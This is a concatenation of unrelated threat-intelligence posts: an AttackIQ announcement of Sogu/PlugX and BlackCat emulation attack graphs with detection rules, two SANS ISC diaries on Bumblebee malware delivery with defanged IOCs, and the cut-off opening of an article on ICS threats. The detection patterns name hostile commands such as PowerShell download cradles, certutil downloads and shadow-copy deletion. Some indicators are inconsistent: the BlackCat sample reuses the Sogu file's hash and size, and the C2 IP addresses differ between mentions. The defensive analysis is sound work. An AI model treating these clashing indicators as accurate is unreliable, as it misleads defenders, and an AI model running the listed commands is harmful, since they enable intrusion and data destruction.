Attack graphs give us a means of arranging real-world malware into its component TTPs to run emulations, and today we are immensely excited to announce our new malware emulation attack graphs.

How do we build it? AttackIQ’s adversary research team analyzes real-world malware and then arranges the TTPs into a logical flow that emulates specific adversary behaviors. The resulting attack graph gives you a cornerstone of hard data – a detailed adversary emulation – to run against your security program and test your defense performance.

What sets malware emulation attack graphs apart from AttackIQ’s other attack graphs is their focus on the TTPs made possible by the malware itself (rather than in an entire adversary intrusion sequence, which could include manual TTPs). Often in incident reports, malware TTPs are either unknown or not understood. Analysts often don’t know whether the TTPs reported in an incident are features of the malware itself, or if they are employed by an intruder manually. AttackIQ’s malware emulation attack graphs focus on key aspects of malware used across many campaigns. They give defenders the opportunity to validate and tune their endpoint security controls and network security controls against each logical stage of a specific malware strain.

Specifically, a malware-based threat assessment helps defensive teams to:

identify core behavior observed in specific malware samples
identify the security technologies that can detect and prevent behaviors in specific malware samples
evaluate the efficacy of defensive technologies (and the overarching security stack) in detecting and preventing specific malware behaviors; and
identify gaps in the team’s security posture that could be filled or improved to detect and prevent specific TTPs.

To kick off these new attack graphs, we chose the ever-prevalent Sogu (a.k.a. PlugX) remote access tool (RAT) and the recent Rust-based ransomware, BlackCat (a.k.a. ALPHV). We will cover these new additions to the AttackIQ Security Optimization Platform in a live demo on May 26, 2022 at 10.000 hrs PT.

Sogu (PlugX)

Sogu (a.k.a. PlugX) is a full-featured, modular RAT with many variants and is used by multiple China-based groups within the espionage threat class, to include APT41, APT10, UNC124, Mustang Panda, and others. Sogu has been around for more than a decade with early reporting as far back as 2008, yet it continues to target victims around the world, to include the semiconductor industry and nation-state governments.

Our Sogu/PlugX attack graph is derived from a sample used in an intrusion by China-based threat actors that targeted the semiconductor and high-tech subsector of the manufacturing industry in July 2020.

This sample was delivered in a self-extracting (SFX) RAR file which contains three files required to implement a DLL side-loading method of execution. When this SFX RAR file is opened by an unwitting user, these files are written to disk and the executable is run.

Legitimate kick-off executable (in the sample analyzed this was a McAfee program).
Hijacked DLL that loads/launches Sogu/PlugX (this DLL is considered hijacked because the legitimate program will natively load the DLL).
Encrypted file holding encrypted Sogu shellcode payload.

This method and required set of files is commonly seen with Sogu/PlugX variants.

Metadata from the sample analyzed

Description: SFX RAR file
Size (bytes): 327583
SHA1: 09deeb57240711b9fcf33d0b154c9ffd0e0984b1

Description: Legitimate exe file
Size (bytes): 140576
SHA1: d201b130232e0ea411daa23c1ba2892fe6468712

Description: Hijacked DLL, loads the payload file
Size (bytes): 199168
SHA1: 040ae092a0ab8801a92c4d0d533a03ce13595e1f

Description: Encrypted payload file
Size (bytes): 121128
SHA1: eb9f611889ef99c7b0c4006e1dea50dd5a8c7f93

This attack graph focuses on the sample’s core TTPs, captured by the following scenarios that emulate behavior as the malware progresses through its code execution.

Attack Graph SoguClick for Larger View

Scenarios 1 and 2: Initial Access: Spearphishing (T1566.002): Sogu is commonly delivered to targets using spearphishing links. For the first scenario in the graph, we begin with the step after a link was clicked by downloading the SFX RAR file package to the endpoint, giving A/V and potentially network security controls the opportunity to detect and or prevent delivery.

1a. Detection Process

Parent Process Name == (Winword.exe OR Excel.exe OR Powerpnt.exe)
Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS ((“DownloadString OR DownloadFile) AND HTTP AND (Invoke-Expression OR IEX)

1b. Mitigation Policies

MITRE recommends the following mitigations for T1566.002:

M1047
M1021
M1054
M1018
M1017

Scenario 3: Save Malicious DLL to Disk: If the SFX RAR file is successfully opened, the trio of files will be written to the victim’s disk. Of these three files, the malicious DLL gives another opportunity to test A/V protection since it isn’t obfuscated like the encrypted Sogu shellcode payload file. This scenario saves the constituent hijacked DLL to disk, mimicking the SFX RAR file’s write operation to the host machine.

3a. Detection Process

While A/V, NGAV and EPP security controls excel at detecting malicious files being saved to disk, Application Control technologies provide opportunities to detect unsigned DLLs being saved to disk. Further, execution of unsigned filetypes (such as DLLs) specified in your Application Control policies can prevented/blocked. Additionally, EDR technologies have the ability to detect these unsigned filetypes being saved to globally writable directories on devices. However, the latter may be false positive prone and lead to excessive alerts. In addition to looking for unsigned DLLs being placed in globally writable directories, using YARA detections to look for strings in malware files is an alternate/effective way of detecting this activity on your endpoints:

PlugX / Sogu YARA Rules

3b. Mitigation Policies

Ensure that devices are placed within a protective (not detective) antivirus policy to act on files through static and dynamic analysis.
Ensure account management is correctly configured through group policy, ensuring proper users only have rights to write to sensitive areas on disk.
Ensure application control technology policies are thought-through, tuned and maintained; you can get very granular with what types of files are indexed and can execute on which systems in your network. For example, self-extracting RAR files can be banned entirely on your network, or unsigned DLLs can be prevented from executing. Attempted execution of banned files is logged and can flow into your SIEM for further alerting or correlation.

Scenario 4: Hijack Execution Flow: DLL Side-Loading (T1574.002): Once the three files are written to disk, the SFX RAR file automatically runs the legitimate McAfee executable leading to DLL side-loading technique. In DLL side-loading, the legitimate binary attempts to load a required DLL and instead of loading the normal benign DLL, a hijacked version is loaded because it resides in the same directory as the McAfee executable.

4a. Detection Process

Process Name == evt.exe (This is the name of the trusted McAfee executable extracted from the RAR file. This binary name is subject to change)
Imageload Name == McUtil.dll (This is the name of the DLL) extracted from the RAR file. This binary name is subject to change
Imageload is_signed == False

4b. Mitigation Policies

MITRE recommends the following mitigations for T1574.002:

M1013
M1051

Additionally, if the legitimate file that is used to load a DLL is not a binary needed for your organization, add the hashes to your application control block lists as soon as possible. Binaries on a block list will not be able to execute even if they are benign by nature.

Scenario 5: Process Injection (T1055.001): Sogu uses process injection both reflectively and remotely to evade defenses. Malicious code can sometimes go undetected by security products because it is running inside a legitimate process. Our emulation mimics DLL code injection by using Windows API calls to LoadLibrary and CreateRemoteThread to inject code into a legitimate process.

5a. Detection Process

Utilize tools such as Procmon.exe or EDR tools to monitor for system Windows API calls such as “LoadLibrary” and “CreateRemoteThread” with unsigned or unrecognized binaries, especially if they are coming from locations that are globally writable or not belonging to the associated injected process.

Process Name == evt.exe (This is the name of the trusted McAfee executable extracted from the RAR file. This binary name is subject to change)
Imageload Name == McUtil.dll (This is the name of the .dll extracted from the RAR file. This binary name is subject to change)
Imageload is_signed == False

5b. Mitigation Policies

MITRE recommends the following mitigations for T1055.001:

M1040

Scenario 6: Persistence via Windows Service (T1543.003): If the malware executes with elevated privilege, persistence is established by creating a new service that will initiate the execution of the benign McAfee binary, starting the process of malicious code execution again.

6a. Detection Process

Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS ((‘sc’ or ‘sc.exe’) AND ‘create’ AND ‘binpath=”<path to trusted executable>”’ AND start=”auto”)

6b. Mitigation Policies

MITRE recommends the following mitigations for T1543.003:

M1047
M1040
M1045
M1028
M1018

Scenario 7: Persistence via Registry Run Key (T1547.001): Alternatively, if the malware is executed as a normal user, persistence is achieved using a standard registry run key. Our attack graph will take this persistence path if the service creation is prevented in the previous scenario.

7a. Detection Process

As registry key modifications is typical for Windows system behavior, it is unusual if you observe registry actions attempted to be carried out by unexpected or underprivileged users. This detection will exclude administrative or expected users to reduce false positives from expected system usage.

Process Name == (cmd.exe or powershell.exe)

User NOT IN <list of expected reg.exe users>

Command Line CONTAINS((reg or reg.exe) AND (“HKEY_CURRENT_USER” OR “KEY_CURRENT_MACHINE”) AND “SOFTWAREMicrosoftWindowsCurrentVersion” AND (“run” OR “runonce”))

7b. Mitigation Policies

Although it is expected Windows behavior for this registry key to be modified for programs to start at boot, modification to these registry keys can be constrained by setting group policy and application control/whitelisting but allowing only authorized users to utilize tools such as cmd.exe, powershell.exe, reg.exe, and regedit.exe

Scenario 8 and 9: Command and Control: DNS (T1071.004): After persistence is set, the malware establishes communication with command and control (C2) infrastructure by abusing the Domain Name System (DNS) application layer protocol to avoid detection/network filtering.

This Sogu sample is configured to send DNS callouts in TXT records that carry encoded victim information prepended to the threat actor-controlled domain. Example:

ENCODEDDATA.ENCODEDDATA.ENCODEDDATA.badSubdomain.badDomain.bad

An initial DNS request is sent through a hardcoded public Google DNS server, 8.8.8.8, which we assess to be a way around potential internal network DNS blacklisting implemented by the victim organization’s security team.

If the Google DNS resolution fails, potentially due to web proxy or DNS policy disallowing external DNS requests, a fallback callout that is identical in content is sent to the host’s default DNS server. Our scenario emulates the structure of the encoded data in these callouts and is sent to AttackIQ infrastructure. This provides defenders the opportunity to build network detections for anomalous DNS traffic like this, which could prove useful beyond Sogu detection.

8a. Detection Process

Typically, C2 traffic is sent through HTTP/HTTPS which is often monitored by network firewalls and content filtering security controls. Threat actors using Sogu/PlugX utilize the DNS protocol to remain undetected. Creating network Snort rules to alert on any UDP 53 connections to flagged IPs may be an effective way to alert on possible C2 activity from threat actors utilizing this technique.

alert udp any 53 -> $HOME_NET any (msg:”*”; rev:001; content:”|43 D7 41 85|”;)

Please note, the content portion here is a hash representation of the destination IP address for the DNS request (i.e., to the C2). This portion should be modified as IP artifacts are collected.

8b. Mitigation Policies

MITRE recommends the following mitigations for T1071.004:

M1037
M1031

Scenario 10: Input Capture: Keylogging (T1056.001): With the C2 channel established, the running implant can now receive commands or Sogu plugins enabling additional capability from the external C2 server. One of the most common commands received is the enabling of keylogging functionality. The scenario uses a system hooking routine to capture any keystrokes using calls to the Windows API.

10a. Detection Process

MITRE detection recommendations for T1056.001:

DS0009
DS0027

Scenario 11: Windows Command Shell (T1059.003): Another post-exploitation behavior of Sogu is the use of the Windows command shell for execution of reconnaissance commands. If the keylogger activity in the previous scenario is prevented by security controls, a command shell is initiated and the following commands are executed: ipconfig, whoami, systeminfo

11a. Detection Process

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS “systeminfo”
User NOT IN User != [<list of expected administrators to be issuing these commands>]

11b. Mitigation Policies

MITRE mitigation Recommendations for T1059.003:

M1038

Additionally, ensure that Group Policy is set and enforced to allow only authorized users/administrators to be able to run cmd.exe or powershell.exe. These interpreters can be limited to lower privileged or unneeded users to prevent enumeration or abuse.

Scenario 12: Data Exfiltration Over HTTP (T1048.003): In our final technique of the attack graph, we emulate exfiltration of data over HTTP by compressing mocked data and transmitting to an AttackIQ controlled server.

12a. Detection Process

MITRE detection Recommendations for T1048.003:

DS0017
DS0022

12b. Mitigation Policies

MITRE mitigation Recommendations for T1048.003:

M1057
M1037
M1031
M1030

BlackCat (ALPHV) Ransomware

BlackCat (a.k.a ALPHV) emerged as ransomware-as-a-Service (RaaS) as early as mid-November 2021, providing would-be attackers with a highly configurable multi-platform ransomware strain written in Rust. BlackCat operators use the double-threat extortion model which not only encrypts victim data but also threatens public exposure of sensitive information that was collected and exfiltrated prior to ransomware deployment.

According to an April 2022 FBI report, BlackCat has compromised at least 60 organizations worldwide through March 2022. True to the nature of RaaS, victim sectors are wide ranging, and have been reported to include German oil, European port authorities, high-end fashion/apparel, and higher education institutions in the United States.

The sample analyzed for our content development was obtained from a known public malware repository and was first submitted to VirusTotal in December 2021.

Sample Metadata

Description: BlackCat.exe (Win32)
Size (bytes): 327583
SHA1: 09deeb57240711b9fcf33d0b154c9ffd0e0984b1

Our BlackCat attack graph emulates a series of core behaviors beginning with introducing the ransomware to the environment, moving through configuration of the host for efficient and effective encryption, preparation for propagation, and finally to BlackCat’s ransomware encryption method.

Attack Graph BlackCatClick for Larger View

Scenarios 1 and 2: Ingress Tool Transfer (T1105): Intruders bring BlackCat into a victim environment after it has been breached. To begin this attack graph, we assume that initial access has been achieved and we emulate the introduction of the ransomware to the endpoint. This pair of scenarios downloads and saves a Windows-based BlackCat sample to disk, giving A/V security controls an opportunity to detect inbound tool delivery, as well as uploads to memory.

1a. Detection Process

Once a malicious actor has compromised an endpoint, they may attempt to transfer any tools or malware onto the device. Attackers may utilize tools such as PowerShell, Certutil, Bitsadmin, and Curl.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS((“IWR” OR “Invoke-WebRequest”) AND “DownloadData” AND “Hidden”)

Certutil Example:

Process Name == Certutil.exe
Command Line Contains (“-urlcache” AND “-f”)

Bitsadmin Example:

Process Name == Bitsadmin.exe
Command Line CONTAINS (“/transfer” AND “http”)

Curl Example:

Process Name == Curl.exe
Command Line CONTAINS (“http” AND “-o”)

1b. Mitigation Policies

MITRE mitigation Recommendations for T1105:

M1031

Additionally, it is advised that non administrators be prevented from using tools such as powershell.exe, cmd.exe, and certutil.exe. This will prevent malicious usage of these tools on end user accounts.

Scenario 3: Windows Management Instrumentation (WMI) Commands (T1047): One of the first things BlackCat does is grab the host machine’s Windows UUID which is used to build a unique victim identifier for the ransom process. The malware retrieves this piece of information by using a living-off-the-land tool, WMI, to issue the following command “csproduct get UUID”.

3a. Detection Process

Developing a baseline of typical binaries that wmiprvse.exe invokes in your environment, then utilizing that baseline to make a detection is a good step in monitoring abnormal Windows Management Instrumentation activity. For example, creating a detection to alert on processes not in a list of known processes being invoked from wmiprvse.exe would identify possible malicious activity.

Monitoring the endpoint for the following would also alert on possible suspicious use:

Process Name == wmic.exe
Command Line CONTAINS (“Process call create” AND(“.dll” OR “.exe”))

3b. Mitigation Policies

MITRE mitigation Recommendations for T1047:

M1040
M1038
M1026
M1018

Additionally, ensure only administrators are authorized to utilize the Windows Management Instrumentation as this tool may be utilized for enumeration, lateral movement, and command execution as seen in this scenario.

Scenario 4: Impair Defenses: Disable or Modify Tools (T1562.001): Here, we implement a new custom scenario that emulates BlackCat’s attempt to allow Remote Symbolic Links on the host using the fsutil command. Enabling these remote symbolic links can expand access to remote file locations for encryption as well as create additional pathways for propagation.

4a. Detection Process

Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS (“fsutil” AND “SymlinkEvaluation” AND (“R2L:1” OR “R2R:1”))

4b. Mitigation Policies

MITRE mitigation Recommendations for T1562.001:

M1022
M1024
M1018

Scenario 5: Modify Registry (T1112): In this scenario we emulate BlackCat’s addition of a registry key that maximizes concurrent network requests made by the host, likely to prevent any hiccups during file encryption of remotely available files. The “MaxMpxCt” key is set to 65535.

5a. Detection Process

Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS ((“reg” OR “reg.exe”) AND “add” AND “HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters” AND “/V MaxMpxCt”)

5b. Mitigation Policies

MITRE mitigation Recommendations for T1112:

M1024

Scenario 6: File Deletion: Volume Shadow Copy (T1070.004): Using the Windows command shell, this scenario reproduces the deletion of Volume Shadow Copies. BlackCat and other ransomware lines make use of this technique to restrict the victim’s ability to restore the encrypted files from backup.

6a. Detection Process

Process Name == vssadmin.exe
Command Line CONTAINS (“delete shadows“)

6b. Mitigation Policies

It is recommended that group policy settings and Application Control/whitelisting software is set to only allow authorized users access to tools such as vssadmin.exe, cmd.exe, and powershell.exe to prevent misusage if an account is compromised.

Additionally, ensure that backup files are set to only be accessed by authorized personnel. These backup files should not have read or write access to underprivileged user accounts.

Scenario 7: System Network Configuration Discovery (T1016): If configured, BlackCat will propagate on a victim’s local network. In order to spread itself to neighbor machines, discovery actions are needed to identify pathways available from the origin host. Network topology data points are obtained with a copy of BlackCat’s network share discovery and MAC address snooping with “arp” commands.

7a. Detection Process

Typically, system enumeration is carried out by using benign, Windows applications. This allows an attacker to gain additional information about the target environment without setting off alarms by using malware or possibly AV flagged software. Since these techniques are utilized by benign Windows processes, the following detections should be taken into account with expected users like network administrators to reduce false positives:

Enumeration through “net” command

Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS ((“net“ OR “net.exe”) AND “use”)
User NOT IN <list of expected net.exe users>

Enumeration through “arp” command

Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS (arp -a)
User NOT IN <list of expected network admins>

7b. Mitigation Policies

Although these are benign Windows commands, they can be used maliciously if threat actors have an account compromised. To reduce this information disclosure, cmd.exe and powershell.exe should be excluded to only necessary administrative users.

Additionally, Windows command line Audit Process Creation auditing can be enabled to see event ID 4688. Enable the GPO setting to “include command line in process creation events.” Windows CLI events can be filtered and forwarded to a SIEM from all endpoints for further filtering, tuning and correlation for detection of anomalous activity.

Scenario 8: Ingress Tool Transfer (T1105): BlackCat carries a copy of the PsExec utility in its resources that is written to disk and likely used to spread itself if configured for propagation. In the sample we analyzed propagation is not enabled, however we included this behavior because it is a configurable option and a tool commonly abused by attackers to achieve various results including moving files over the network and remote process execution.

8a. Detection Process

PsExec is not malicious by nature and is signed by Microsoft as it is a Microsoft published SysInternals tool. This tool may be used maliciously to move laterally on devices within a network, and should be monitored for authorized usage only. If this is not an expected binary in your environment for network administrators to utilize, then we recommend monitoring for this file periodically to see if any have been placed on the system without approved intent. PsExec with alternate credentials specified on the command line is a Logon Type 3+2 event and it should be noted that this passes those credentials in plaintext across the network as well as leaves those credentials vulnerable to theft on the target host. PsExec usage without explicit credentials is a Type 3 Logon event and does not leave any credentials on the target host.

8b. Mitigation Policies

MITRE mitigation Recommendations for T1105:

M1031

Even legitimate usage of PsExec is still problematic from a security perspective. For the best security, PsExec should be globally banned from execution using Application Control/whitelisting software. Sys Admin or authorized usage of PowerShell Remoting is a much more secure and preferred option for legitimate Type 3 Logons in your environment and does not leave credentials on the target host.

Scenario 9: File and Directory Discovery (T1083): At this stage of the kill chain, BlackCat preps for file encryption by enumerating the filesystem searching for data to encrypt.

9a. Detection Process

Searching the file system on Windows machines is typically done through the CLI with the use of the “dir” command. This is typical Windows behavior, but monitoring for this behavior may help identify malicious actions in your environment. Often enumerated behavior on endpoints is sent to a file for exfiltration and examination by the attacker:

Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS ((“dir“ AND “>”)

Please note, this detection can be very loud if end users or administrators commonly search the file system and save results with the “>” argument. To narrow this detection down, add in sensitive file paths that are not often viewed by typical end users to increase fidelity.

9b. Mitigation Policies

Although these are benign Windows commands, they can be used maliciously if threat actors have an account compromised. To reduce this information disclosure, cmd.exe and powershell.exe should be excluded to only necessary administrative users.

Additionally, ensure that files and directories have proper permissions assigned to prevent unauthorized viewing or modification by underprivileged users.

Scenario 10: Data Encrypted for Impact (T1486): In our last step of the attack graph, we mimic BlackCat’s encryption method implementing 128-bit AES-NI in CTR mode if supported by the host hardware and falling back to ChaCha20 if not. In addition to the specific encryption algorithm, we also emulate parts of the unique encryption process used by BlackCat.

One of these steps is the use of a temporary checkpoint file written to disk, that serves as a position marker if file encryption is interrupted. A checkpoint file is written to disk for each file during the encryption process and then removed once the file has been fully encrypted. The name of this file is the name of the file being encrypted with the string “checkpoints-” prepended to it. This is a unique IOC and could be used in a detection signature.

Another nuance we’ve captured in the encryption scenario is BlackCat’s file extension exclusion list. The configuration block of BlackCat specifies file names, directories, and extensions to exclude from encryption, ensuring the host remains stable during the process and reducing the number of files to encrypt if they provide no ransom value.

We’ve also taken care to emulate the structure of the file after encryption including an encrypted block of JSON that contains the private key and other metadata required to decrypt the file.

10a. Detection Process

A detection rule could be written to catch the checkpoint file written to disk during the encryption process:

FileName starts_with “checkpoints-”

In addition, Blackcat Ransomware group searches for the following extensions to encrypt:

.themepack, .nls, .diagpkg, .msi, .lnk, .exe, .cab, .scr, .bat, .drv, .rtp, .msp, .prf, .msc, .ico, .key, .ocx, .diagcab, .diagcfg, .pdb, .wpx, .hlp, .icns, .rom, .dll, .msstyles, .mod, .ps1, .ics, .hta, .bin, .cmd, .ani, .386, .lock, .cur, .idx, .sys, .com, .deskthemepack, .shs, .ldf, .theme, .mpa, .nomedia, .spl, .cpl, .adv, .icl, .msu

Excessive file modifications to a variety of these file extensions within a very short time window would be an indicator of this impact activity occurring in your environment.

10b. Mitigation Policies

MITRE mitigation Recommendations for T1486:

M1040
M1053

In summary, AttackIQ’s new malware emulation attack graphs emulate core techniques and procedures designed into the malware as a crucial part of an adversary’s overall kill chain. With data generated from continuous testing and use of this attack graph, you can focus your teams on achieving key security outcomes, adjusting your security controls, and working to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ stands at the ready to help security teams implement this attack graph and other aspects of the AttackIQ Security Optimization Platform, including through our co-managed security service, AttackIQ Vanguard.

The post Announcing AttackIQ’s Malware Emulation Attack Graphs appeared first on AttackIQ.

Introduction

Last month, Google’s Threat Analysis Group (TAG) reported on EXOTIC LILY using file transfer services like TransferNow, TransferXL, WeTransfer, or OneDrive to distribute malware (link).  Threat researchers like @k3dg3 occasionally report malware samples from this activity.  Based on @k3dg3’s recent tweet, I searched through VirusTotal and found a handful of active TransferXL URLs delivering ISO files for Bumblebee malware.

Today’s diary reviews an infection generated from this activity on Wednesday 2022-05-18.

Shown above:  Flow chart for infection discussed in this diary.

TransferXL URLs

TransferXL is a legitimate file sharing service.  However, like other services with a cost-free tier, TransferXL has been abused by criminals as a way to distribute malicious files.  However, with TransferXL, we have the benefit of seeing an email address used to share the malicious file.  The image below shows a malicious TransferXL URL recently submitted to VirusTotal.  Viewed in a web browser, it sends a malicious file.  The associated email address is jhurris@wolsleyindustrialgroup.com.

Shown above:  Malicious TransferXL URL delivering malware.

The downloaded zip archive contains an ISO disk image.  When double-clicked, this file is mounted as a DVD drive.  The ISO file contains a visible Windows shortcut and a hidden malware DLL for Bumblebee.  Double-clicking the Windows shortcut will run the hidden malware DLL on a vulnerable Windows host.

Shown above:  Downloaded ISO file mounted as a disk image containing Windows shortcut and hidden malware DLL.

Traffic from an infection

After downloading malware from the malicious TransferXL URL, the infected host generated Bumblebee C2 traffic to 194.135.33[.]134 over TCP port 443.

Shown above:  Initial infection activity with Bumblebee C2 traffic filtered in Wireshark.

Approximately 15 minutes after the Bumblebee C2 traffic first appeared, the infected Windows host generated HTTPS traffic to ec2-3-144-143-232-us-east-2.compute.amazonaws[.]com on 3.144.143[.]242 over TCP port 443.  The infected host sent approximately 5.5 MB of data out and received approximately 4.0 MB of data back from that server.

Shown above:  Encrypted (HTTPS) traffic to an amazonAWS server.

Approximately 14 minutes after HTTPS traffic to the amazonAWS server, HTTPS Cobalt Strike traffic appeared on 23.106.215[.]123 over TCP port 443 using xenilik[.]com as the domain.  It lasted approximately 3 minutes.

Shown above:  Traffic from the infection showing Cobalt Strike activity.

Indicators of Compromise (IOCs)

TransferXL URLs associated with the above email returning zip archives containing malicious ISO files.

hxxps://www.transferxl[.]com/download/00ZNPDZqZwZ9mhxxps://www.transferxl[.]com/download/00jwbtRXtsSsZXhxxps://www.transferxl[.]com/download/00vJV4K6QVXSq6hxxps://www.transferxl[.]com/download/00y12VGg75h7Khxxps://www.transferxl[.]com/download/08j8ZRjHFkVxxc

NOTE: The above URLs usually have ?utm_source=downloadmail&utm_medium=e-mail appended to them.

Email addresses associated with malicious TransferXL URLs:

andresbolivar@southerncompanygas[.]cojhurris@wolsleyindustrialgroup[.]comm.jones@wolsleyindustrialgroup[.]commjones@wolsleyindustrialgroup[.]co

Domains from the above emails:

southerncompanygas[.]co – registered 2022-04-27wolsleyindustrialgroup[.]com – registered 2022-04-29wolsleyindustrialgroup[.]co – not registered

Malware from an infected Windows host:

SHA256 hash: 1ec8c7e21090fb4c667f40c8720388a89789c569169fe0e41ec81567df499aac

File size: 669,897 bytesFile name: TransferXL-00jdMwft3vVZ7Q.zipFile description: Zip archive retrieved from TransferXL URL

SHA256 hash: 24aa82e1a085412686af5d178810fc0d056c5b8167ae5b88973b33071aa14569

File size: 1,052,672 bytesFile name: documents-2205210.isoFile description: ISO file extracted from downloaded zip archive

SHA256 hash: ade875616534b755f33f6012ea263da808dd7eb50bc903fc97722f37fac7c164

File size: 1,191 bytesFile name: New Folder.lnkFile description: Windows shortcut contained in ISO fileShortcut: C:WindowsSystem32rundll32.exe spc.dll,JQhnMKwhpA

SHA256 hash: 88c07354f1d7b0485452d5c39dc1a6d73884e163bc5489c40adc6662602b4d76

File size: 997,888 bytesFile name: spc.dllFile description: 64-bit DLL (hidden flag set) for Bumblebee malwareRun method: rundll32.exe [filename],JQhnMKwhpA

Traffic from the infected Windows host:

194.135.33[.]144 port 443 – Bumblebee C2 HTTPS traffic3.144.143[.]242 port 443 – ec2-3-144-143-242.us-east-2.compute.amazonaws[.]com – HTTPS traffic23.106.215[.]123 port 443 – xenilik[.]com – Cobalt Strike HTTPS traffic

Final words

As the Google TAG blog post notes, EXOTIC LILY is using this method to push Bumblebee malware, and Bumblebee leads to further malware like Cobalt Strike.  And Cobalt Strike has been documented by different sources as leading to ransomware.

Today’s diary reviewed a Bumblebee malware infection associated with EXOTIC LILY that led to Cobalt Strike activity.

Pcap and malware samples associated with this infection are available here.

—Brad Duncanbrad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

INTRODUCTION:

Identified by Proofpoint as the threat actor behind the Contact Forms campaign, TA578 also appears to be pushing ISO files for Bumblebee malware through thread-hijacked emails.  These threat-hijacked emails either have links to storage.googleapis.com URLs similar to those used in the Contact Forms campaign, or they have password-protected zip attachments.  Either method delivers an ISO file containing files to install Bumblebee malware.

Today’s diary compares two examples of ISO files for Bumblebee malware from Monday 2022-05-09 that appear to be from TA578.


Shown above:  Infection chains from TA578 on Monday 2022-05-09.

INFECTION CHAIN COMPARISON: LINK TO ‘DOCUMENT’ DOWNLOAD PAGE:


Shown above:  TA578 Thread-hijacked email with malicious storage.googleapis.com link.


Shown above:  TA578 ‘document’ download page hosted on storage.googleapis.com URL delivers malicious ISO file for Bumblebee malware.


Shown above:  Contents of downloaded document.iso file.

INFECTION CHAIN COMPARISON: PASSWORD-PROTECTED ZIP ATTACHMENT:


Shown above:  TA578 email with password-protected zip attachment.


Shown above:  Malicious ISO file for Bumblebee malware extracted from password-protected zip attachment.

ISO FILE COMPARISON:

SHA256 hash: 330b01256efe185fc3846b6b1903f61e1582b5a5127b386d0542d7a49894d0c2

File size: 2,883,584 bytes
File name: document.iso
File description: malicious ISO file sent by ‘documents’ download page

SHA256 hash: e9084037805a918e00ac406cf99d7224c6e63f72eca3babc014b34863fb81949

File size: 2,883,584 bytes
File name: invoice_pdf_49.iso
File description: malicious ISO file extracted from password-protected zip attachment

ISO CONTENT COMPARISON:

SHA256 hash: 22e033c76bb1070953325f58caeeb5c346eca830033ffa7238fb1e4196b8a1b9

File size: 1,612 bytes
File name: documents.lnk
File description: Windows shortcut in both document.iso and invoice_pdf_49.iso
Shortcut: %windir%system32rundll32.exe ramest.dll,SjVjlixjPb

SHA256 hash: e6357f7383b160810ad0abb5a73cfc13a17f4b8ea66d6d1c7117dbcbcf1e9e0f

File size: 1,390,592 bytes
File name: ramest.dll
File description: Bumblebee 64-bit DLL in document.iso

SHA256 hash: f398740233f7821184618c6c1b41bc7f41da5f2dbde75bbd2f06fc1db70f9130

File size: 1,3900,80 bytes
File name: ramest.dll
File description: Bumblebee 64-bit DLL in invoice_pdf_49.iso

Note: Both of the above ramest.dll files have the same import hash (imphash) of 66356a654249c4824378b1a70e7cc1e5

SIMILARITIES TO CONTACT FORMS CAMPAIGN:

TA578 ‘document’ download pages are similar to ‘Stolen Images Evidence’ pages used for the Contact Forms campaign.  Both are hosted on storage.googleapis.com pages with appspot.com in the URL.  Both generate traffic to a malicious URL ending in logo.jpg that returns script with base64 text used to generate a malicious ISO file for download.

The following are 4 examples of URLs generated by ‘document’ download pages for malicious ISO files in May 2022:

hxxps://baronrtal[.]com/img/logo.jpg
hxxps://bunadist[.]com/img/logo.jpg
hxxps://omnimature[.]com/img/logo.jpg
hxxps://vorkinal[.]com/img/logo.jpg

The following are 4 examples of URLs generated by ‘Stolen Images Evidence’ pages for malicious ISO files in May 2022:

hxxps://bunadist[.]com/images/logo.jpg
hxxps://curanao[.]com/images/logo.jpg
hxxps://goranism[.]com/images/logo.jpg
hxxps://olodaris[.]com/images/logo.jpg

As seen above, ‘Stolen Images Evidence’ pages generate URLs ending in /images/logo.jpg, while ‘document’ download pages generate URLs ending in /img/logo.jpg.

URLs hosted on storage.googleapis.com for ‘Stolen Images Evidence’ pages end with ?l= or ?h= or similar strings ollowed by a numeric value.  For example, hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/fWpa4HT4ck6v6.html?l=827470894993112750 is a URL for a recent ‘Stolen Images Evidence’ page.

URLs hosted on storage.googleapis.com for ‘document’ download pages end in .html.  For example: hxxps://storage.googleapis[.]com/pz3ksj5t45tg4t.appspot.com/q/pub/file/0/filejBWdkst6Ua3s.html is a URL for a recent ‘document’ download page.

FINAL WORDS:

The Contact Forms campaign switches between pushing ISO files for Bumblebee malware, or pushing ISO files for IcedID (Bokbot) malware, and I’ve seen both during the same week.  Since February 2022, TA578 has been noted pushing both families of malware.  And in recent weeks, TA578 has been using thread-hijacked emails to distribute ISO files for Bumblebee malware.  TA578 might also distribute IcedID using the same type of thread-hijacked messages.

While the malware may be different, I occasionally find Cobalt Strike from either Bumblebee or IcedID when testing samples in Active Directory (AD) environments.  Cobalt Strike can lead to ransomware or other malicious activity.

If TA578 activity is caught and stopped in its early stages, potential victims might avoid more serious harm.


Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Engineers, whether working on energy grids or power generation or resource exploitation, are building and maintaining the networks and systems which will be the targets of future ICS malware.

And although we are more aware of threats than ever before, a future attempt to disable safety systems or overload a network with malicious traffic to cause harm will certainly occur, writes Jason Atwell, Principal Advisor of Global Intelligence at Mandiant.

Shortly before Christmas in 2015 the power grid in Ukraine suffered a series of outages that impacted roughly a quarter of a million consumers and lasted several hours.[1] Later, in 2017 the same group used ransomware to shutdown servers all over Ukraine, including at the infamous Chernobyl Nuclear Power Plant.[2] The actor behind this attack was a Russian state-sponsored group known as “Sandworm.” Because of the role this group has played in defining the scope and threat from cyber actors to power grids, cyber professionals and intelligence analysts around the globe have been watching keenly for any evidence of the group’s current activity during the current crisis in Ukraine.

